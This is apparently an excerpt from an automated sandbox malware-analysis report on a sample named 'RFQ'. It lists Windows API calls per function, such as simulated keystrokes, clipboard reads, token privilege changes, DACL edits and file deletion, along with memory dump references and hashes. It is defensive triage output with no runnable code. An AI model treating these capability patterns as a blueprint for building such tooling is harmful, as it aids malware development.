• SendMessageW.USER32 ref: 0079FE6F
• ClientToScreen.USER32(?,?), ref: 0079FEC5
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0079FEF1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0079FF19
• SendMessageW.USER32 ref: 0079FF3C
• ClientToScreen.USER32(?,?), ref: 0079FF86
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0079FFB6
• GetWindowLongW.USER32(?,000000F0), ref: 007A004B
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 2516578528-4164748364
• Opcode ID: 00894f9220d49c329883a63adab7281d8aaf07ceac120fef10430908cb4379ea
• Instruction ID: ab63853d3027e3d00b73b677569e32adc0623596935a7af7bcbfcc96f1e9aef9
• Opcode Fuzzy Hash: 00894f9220d49c329883a63adab7281d8aaf07ceac120fef10430908cb4379ea
• Instruction Fuzzy Hash: 1332CB70604245EFDB20CF28D884FAABBA8FF49358F144A29F695C72A1D739EC51CB51
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0079B1CD
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
• Opcode ID: 0df089ab0bcb443056476164b9a6aea28ab3d9e2d03e037eb96026a2017ee3ce
• Instruction ID: 56058533dd252281ff935aaeab744771cc8fa20b2721a9d72f3b087511fdb157
• Opcode Fuzzy Hash: 0df089ab0bcb443056476164b9a6aea28ab3d9e2d03e037eb96026a2017ee3ce
• Instruction Fuzzy Hash: 3212B071500208ABEF259F68ED49FAE7BB8FF85710F108229F915DB2D1DB788941CB51
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 0074EB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A3AEA
• IsIconic.USER32(000000FF), ref: 007A3AF3
• ShowWindow.USER32(000000FF,00000009), ref: 007A3B00
• SetForegroundWindow.USER32(000000FF), ref: 007A3B0A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007A3B20
• GetCurrentThreadId.KERNEL32 ref: 007A3B27
• GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007A3B33
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007A3B44
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007A3B4C
• AttachThreadInput.USER32(00000000,?,00000001), ref: 007A3B54
• SetForegroundWindow.USER32(000000FF), ref: 007A3B57
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B6C
• keybd_event.USER32(00000012,00000000), ref: 007A3B77
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B81
• keybd_event.USER32(00000012,00000000), ref: 007A3B86
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B8F
• keybd_event.USER32(00000012,00000000), ref: 007A3B94
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B9E
• keybd_event.USER32(00000012,00000000), ref: 007A3BA3
• SetForegroundWindow.USER32(000000FF), ref: 007A3BA6
• AttachThreadInput.USER32(000000FF,?,00000000), ref: 007A3BCD
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 59c13e7aced595ac7f9160fe2e774cf828d2e749c1a15394aeca465d0ff27f73
• Instruction ID: c6dec4dc75a88dc2680e0ab3ae480f17cf0da9ad531ea9377da8db182bd07452
• Opcode Fuzzy Hash: 59c13e7aced595ac7f9160fe2e774cf828d2e749c1a15394aeca465d0ff27f73
• Instruction Fuzzy Hash: AB3196B1A40318BBEB305F659C49F7F7E6CEF84B50F108125FA05EA1D0E6B85D109AB4
APIs
  • Part of subcall function 0076B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
  • Part of subcall function 0076B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
  • Part of subcall function 0076B134: GetLastError.KERNEL32 ref: 0076B1BA
• _memset.LIBCMT ref: 0076AD08
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0076AD5A
• CloseHandle.KERNEL32(?), ref: 0076AD6B
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0076AD82
• GetProcessWindowStation.USER32 ref: 0076AD9B
• SetProcessWindowStation.USER32(00000000), ref: 0076ADA5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0076ADBF
  • Part of subcall function 0076AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0076ACC0), ref: 0076AB99
  • Part of subcall function 0076AB84: CloseHandle.KERNEL32(?,?,0076ACC0), ref: 0076ABAB
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $H*~$default$winsta0
• API String ID: 2063423040-1985088185
• Opcode ID: 68edb1114b59e7765f6c1765a9f0b16855924f9a5cf16851a2872a80177e8fe9
• Instruction ID: f5921f6ea662c2c0b3e7c9acd7c6bc0a721411be5fd1dca0bb64b6828ace4bd1
• Opcode Fuzzy Hash: 68edb1114b59e7765f6c1765a9f0b16855924f9a5cf16851a2872a80177e8fe9
• Instruction Fuzzy Hash: 0F815AB1900209BFDF119FA4CC49AEE7B79EF08304F048159FC16B2161EB7A8E559F62
APIs
  • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
  • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00775FA6,?), ref: 00776EF1
  • Part of subcall function 0077725E: __wsplitpath.LIBCMT ref: 0077727B
  • Part of subcall function 0077725E: __wsplitpath.LIBCMT ref: 0077728E
  • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
• _wcscat.LIBCMT ref: 00776149
• _wcscat.LIBCMT ref: 00776167
• __wsplitpath.LIBCMT ref: 0077618E
• FindFirstFileW.KERNEL32(?,?), ref: 007761A4
• _wcscpy.LIBCMT ref: 00776209
• _wcscat.LIBCMT ref: 0077621C
• _wcscat.LIBCMT ref: 0077622F
• lstrcmpiW.KERNEL32(?,?), ref: 0077625D
• DeleteFileW.KERNEL32(?), ref: 0077626E
• MoveFileW.KERNEL32(?,?), ref: 00776289
• MoveFileW.KERNEL32(?,?), ref: 00776298
• CopyFileW.KERNEL32(?,?,00000000), ref: 007762AD
• DeleteFileW.KERNEL32(?), ref: 007762BE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 007762E1
• FindClose.KERNEL32(00000000), ref: 007762FD
• FindClose.KERNEL32(00000000), ref: 0077630B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 1917200108-1173974218
                                                                                                                                                    • Opcode ID: 08d212ddbe037b79da6ca524035f8c3f714c5df2f67d39e5ffaa3968a177ed93
                                                                                                                                                    • Instruction ID: 3a0bc0aa9afe7eb05cfbdcf26b4db52e8c4f63bae9ab2e73cc04f4d223f963ed
                                                                                                                                                    • Opcode Fuzzy Hash: 08d212ddbe037b79da6ca524035f8c3f714c5df2f67d39e5ffaa3968a177ed93
                                                                                                                                                    • Instruction Fuzzy Hash: B151117290811C9ACF21EB51CC48EDB77BCBB05340F0541E6E549E3146EA7A9B498FA4
APIs
• OpenClipboard.USER32(007CDC00), ref: 00786B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00786B44
• GetClipboardData.USER32(0000000D), ref: 00786B4C
• CloseClipboard.USER32 ref: 00786B58
• GlobalLock.KERNEL32(00000000), ref: 00786B74
• CloseClipboard.USER32 ref: 00786B7E
• GlobalUnlock.KERNEL32(00000000), ref: 00786B93
• IsClipboardFormatAvailable.USER32(00000001), ref: 00786BA0
• GetClipboardData.USER32(00000001), ref: 00786BA8
• GlobalLock.KERNEL32(00000000), ref: 00786BB5
• GlobalUnlock.KERNEL32(00000000), ref: 00786BE9
• CloseClipboard.USER32 ref: 00786CF6
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 40dbabd8428d3cdc31509eb096fd6164ff3d12c3398457ad9f7eee38d0e387d2
• Instruction ID: 4b260d778475298dc4d5e510533e7e98df4799bcedb7946fd46b07c19010fdb5
• Opcode Fuzzy Hash: 40dbabd8428d3cdc31509eb096fd6164ff3d12c3398457ad9f7eee38d0e387d2
• Instruction Fuzzy Hash: 2151BF71240201ABE321BF64DC9AF6E77A8AF88B44F108129F546D61D1EF78ED058B66
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0077F62B
• FindClose.KERNEL32(00000000), ref: 0077F67F
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0077F6A4
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0077F6BB
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0077F6E2
• __swprintf.LIBCMT ref: 0077F72E
• __swprintf.LIBCMT ref: 0077F767
• __swprintf.LIBCMT ref: 0077F7BB
  • Part of subcall function 0075172B: __woutput_l.LIBCMT ref: 00751784
• __swprintf.LIBCMT ref: 0077F809
• __swprintf.LIBCMT ref: 0077F858
• __swprintf.LIBCMT ref: 0077F8A7
• __swprintf.LIBCMT ref: 0077F8F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 835046349-2428617273
• Opcode ID: bc0c099d008a8e08b8e71c4973353f3a45acecad4b3233f1965843b9dd4f7c7a
• Instruction ID: b6334ae0995c3faac7b4acfa3047946f78356b3d09f8e82050fc0599047aac13
• Opcode Fuzzy Hash: bc0c099d008a8e08b8e71c4973353f3a45acecad4b3233f1965843b9dd4f7c7a
• Instruction Fuzzy Hash: EBA12EB2408344EBD315EB94C889DAFB7ECBF98700F40492DF595D2152EB39E949CB62
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00781B50
• _wcscmp.LIBCMT ref: 00781B65
• _wcscmp.LIBCMT ref: 00781B7C
• GetFileAttributesW.KERNEL32(?), ref: 00781B8E
• SetFileAttributesW.KERNEL32(?,?), ref: 00781BA8
• FindNextFileW.KERNEL32(00000000,?), ref: 00781BC0
• FindClose.KERNEL32(00000000), ref: 00781BCB
• FindFirstFileW.KERNEL32(*.*,?), ref: 00781BE7
• _wcscmp.LIBCMT ref: 00781C0E
• _wcscmp.LIBCMT ref: 00781C25
• SetCurrentDirectoryW.KERNEL32(?), ref: 00781C37
• SetCurrentDirectoryW.KERNEL32(007E39FC), ref: 00781C55
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00781C5F
• FindClose.KERNEL32(00000000), ref: 00781C6C
• FindClose.KERNEL32(00000000), ref: 00781C7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 5694f8d9a87dbe6fc4abfa4a6bca8edf989be28d298b29f927ce70da352d359b
• Instruction ID: 48fe516bd21972a5f85dc59f32225f4fcc785f77ccd67eb75a0d59b544230e93
• Opcode Fuzzy Hash: 5694f8d9a87dbe6fc4abfa4a6bca8edf989be28d298b29f927ce70da352d359b
• Instruction Fuzzy Hash: E231D671541219ABCF20ABA4DC49FEE77ACAF05320F5042A5E911E3090EB78DE468B64
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00781CAB
• _wcscmp.LIBCMT ref: 00781CC0
• _wcscmp.LIBCMT ref: 00781CD7
  • Part of subcall function 00776BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00776BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 00781D06
• FindClose.KERNEL32(00000000), ref: 00781D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 00781D2D
• _wcscmp.LIBCMT ref: 00781D54
• _wcscmp.LIBCMT ref: 00781D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00781D7D
• SetCurrentDirectoryW.KERNEL32(007E39FC), ref: 00781D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00781DA5
• FindClose.KERNEL32(00000000), ref: 00781DB2
• FindClose.KERNEL32(00000000), ref: 00781DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 2053cf63109c29fe5f24807795717a4d4559347831a63ca46628a22504203d88
• Instruction ID: 13af4478d383359648efb57af0263b506f7e9239029c03866109e59a74d05e1e
• Opcode Fuzzy Hash: 2053cf63109c29fe5f24807795717a4d4559347831a63ca46628a22504203d88
• Instruction Fuzzy Hash: 3E31E53164061EBACF20BBA4DC49FEE77AC9F05324F504695E901A3191EB78DE468B64
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                                                                    • API String ID: 2102423945-2023335898
                                                                                                                                                    • Opcode ID: 3a3012ddc4fd964c4cb589f297da467bb5b9687a99ef86ba224863f19b995fa2
                                                                                                                                                    • Instruction ID: 555cecc6a68f25bf5b3c2010027cd3b0b2420faa0efb4d9173e6f97854f2b568
                                                                                                                                                    • Opcode Fuzzy Hash: 3a3012ddc4fd964c4cb589f297da467bb5b9687a99ef86ba224863f19b995fa2
                                                                                                                                                    • Instruction Fuzzy Hash: 6782A3B1D04219DBDF28CF98C8807EDB7B1BF89310F258269D855AB352E7789D85CB90
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 007809DF
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007809EF
                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007809FB
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00780A59
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780A71
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780A83
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00780A98
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780AAC
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780ADE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780AFF
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00780B0B
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00780B4A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                                                    • Opcode ID: 1f37e6e21b7d25a1d9a5f1fc054a925a038d6c73068e81962f36efb0bf8bf6e8
                                                                                                                                                    • Instruction ID: 9110bc68ea5e687f2b9737642c75194cca280ad0c7c07b690a5fd95918bc6e5f
                                                                                                                                                    • Opcode Fuzzy Hash: 1f37e6e21b7d25a1d9a5f1fc054a925a038d6c73068e81962f36efb0bf8bf6e8
                                                                                                                                                    • Instruction Fuzzy Hash: F2614EB25043059FD710EF60C88999EB3E8FF89314F04895DF989C7252EB39E949CB92
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
                                                                                                                                                      • Part of subcall function 0076ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
                                                                                                                                                      • Part of subcall function 0076ABBB: HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
                                                                                                                                                      • Part of subcall function 0076AC56: GetProcessHeap.KERNEL32(00000008,0076A6B5,00000000,00000000,?,0076A6B5,?), ref: 0076AC62
                                                                                                                                                      • Part of subcall function 0076AC56: HeapAlloc.KERNEL32(00000000,?,0076A6B5,?), ref: 0076AC69
                                                                                                                                                      • Part of subcall function 0076AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0076A6B5,?), ref: 0076AC7A
                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0076A6D0
                                                                                                                                                    • _memset.LIBCMT ref: 0076A6E5
                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0076A704
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A715
                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0076A752
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0076A76E
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0076A78B
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0076A79A
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0076A7A1
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0076A7C2
                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 0076A7C9
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0076A7FA
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0076A820
                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0076A834
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                                    • Opcode ID: 37ed64a5ff4eefbac859f33954d1295ade88c6094e01c61f1e9a724ec889b0c4
                                                                                                                                                    • Instruction ID: 146f3773013c0bc0766747899d686148052d6be106090b186e1f53512bf99097
                                                                                                                                                    • Opcode Fuzzy Hash: 37ed64a5ff4eefbac859f33954d1295ade88c6094e01c61f1e9a724ec889b0c4
                                                                                                                                                    • Instruction Fuzzy Hash: 9751197190020ABFDF119F95DC85EEEBBB9FF04300F048129E916A7291EB399A05CF65
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: }$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$}}} }
                                                                                                                                                    • API String ID: 0-1974830898
                                                                                                                                                    • Opcode ID: a38610a603901aa28e2bdc7f38440fe7ea8e59dbfe90a2768f30a77bb396dedf
                                                                                                                                                    • Instruction ID: ed0e53e148a1031a24683fb5b6984e957f5cf58af90513fd82896e468fe2af3e
                                                                                                                                                    • Opcode Fuzzy Hash: a38610a603901aa28e2bdc7f38440fe7ea8e59dbfe90a2768f30a77bb396dedf
                                                                                                                                                    • Instruction Fuzzy Hash: BA7284B1E05259DBDF24CF59C8407EEB7B5BF48310F14816AE815EB281DB789E81DB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
                                                                                                                                                      • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776441
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077645F
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00776474
                                                                                                                                                    • _wcscpy.LIBCMT ref: 007764A3
                                                                                                                                                    • _wcscat.LIBCMT ref: 007764B8
                                                                                                                                                    • _wcscat.LIBCMT ref: 007764CA
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 007764DA
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007764EB
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00776506
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
